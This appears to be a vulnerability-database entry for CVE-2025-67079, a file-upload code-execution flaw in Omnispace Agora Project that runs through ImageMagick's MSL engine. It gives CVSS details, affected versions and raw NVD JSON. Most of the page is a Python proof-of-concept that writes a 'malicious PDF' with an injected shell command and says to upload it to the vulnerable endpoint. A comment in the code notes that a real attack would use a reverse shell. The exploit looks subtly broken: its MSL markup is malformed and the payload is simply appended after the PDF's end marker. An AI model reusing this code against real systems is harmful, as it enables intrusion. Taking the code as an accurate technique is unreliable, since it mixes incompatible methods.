Security Vulnerability Report
CVE-2025-67079 CVSS 9.8 CRITICAL

CVE-2025-67079

Published: 2026-01-15 16:16:12
Last Modified: 2026-01-21 14:42:07

Description

File upload vulnerability in Omnispace Agora Project before 25.10 allowing attackers to execute code through the MSL engine of the Imagick library via crafted PDF file to the file upload and thumbnail functions.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:agora-project:agora-project:*:*:*:*:*:*:*:* - VULNERABLE
Omnispace Agora Project < 25.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2025-67079 PoC - Omnispace Agora Project File Upload RCE via ImageMagick MSL
# This PoC demonstrates the vulnerability by creating a malicious PDF with embedded MSL script

import sys


def generate_malicious_pdf():
    """Generate a malicious PDF file containing MSL script for ImageMagick exploitation"""
    # MSL script that will be executed by ImageMagick
    msl_script = '''
    <?xml version="1.0" encoding="UTF-8"?>
    <image>
    <read filename="pdf:/MSL_PAYLOAD"/>
    <get width="height"ura="base-width"/>
    <resize geometry="new-widthxnew-height"/>
    <write filename="/tmp/pwned.txt" />
    </image>
    '''

    # The actual command to execute (modify as needed)
    # This example writes to a file; in real attack, this would be a reverse shell or other malicious command
    command = "| touch /tmp/pwned_by_cve_2025_67079"

    # Replace placeholder with actual command
    msl_payload = msl_script.replace("MSL_PAYLOAD", command)

    # Create malicious PDF with MSL script embedded
    malicious_pdf = f"""%PDF-1.4
1 0 obj
<<
/Type /Catalog
/Pages 2 0 R
>>
endobj
2 0 obj
<<
/Type /Pages
/Kids [3 0 R]
/Count 1
>>
endobj
3 0 obj
<<
/Type /Page
/Parent 2 0 R
/MediaBox [0 0 612 792]
>>
endobj
xref
0 4
0000000000 65535 f
0000000009 00000 n
0000000058 00000 n
0000000115 00000 n
trailer
<<
/Size 4
/Root 1 0 R
>>
startxref
196
%%EOF
%MSL Injection Point - ImageMagick will process this
{msl_payload}
"""
    return malicious_pdf


def main():
    print("[*] CVE-2025-67079 PoC Generator")
    print("[*] Target: Omnispace Agora Project < 25.10")
    print("[*] Vulnerability: File Upload RCE via ImageMagick MSL Engine")

    # Generate the malicious PDF
    pdf_content = generate_malicious_pdf()

    # Save to file
    output_file = "exploit_cve_2025_67079.pdf"
    with open(output_file, 'w') as f:
        f.write(pdf_content)

    print(f"[+] Malicious PDF created: {output_file}")
    print("[+] Upload this file to the vulnerable file upload endpoint")
    print("[+] The ImageMagick MSL engine will execute embedded commands")


if __name__ == "__main__":
    main()
```

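References

https://www.agora-project.net (Product)
https://www.helx.io/blog/advisory-agora-project/ (Third Party Advisory)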

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67079", "sourceIdentifier": "[email protected]", "published": "2026-01-15T16:16:11.977", "lastModified": "2026-01-21T14:42:07.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "File upload vulnerability in Omnispace Agora Project before 25.10 allowing attackers to execute code through the MSL engine of the Imagick library via crafted PDF file to the file upload and thumbnail functions."}, {"lang": "es", "value": "Vulnerabilidad de carga de archivos en Omnispace Agora Project anterior a 25.10 permitiendo a los atacantes ejecutar código a través del motor MSL de la biblioteca Imagick mediante un archivo PDF manipulado a las funciones de carga de archivos y miniaturas."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:agora-project:agora-project:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.10", "matchCriteriaId": "03FDD8D6-01A9-4C64-9893-65C744702416"}]}]}], "references": [{"url": "https://www.agora-project.net", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.helx.io/blog/advisory-agora-project/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}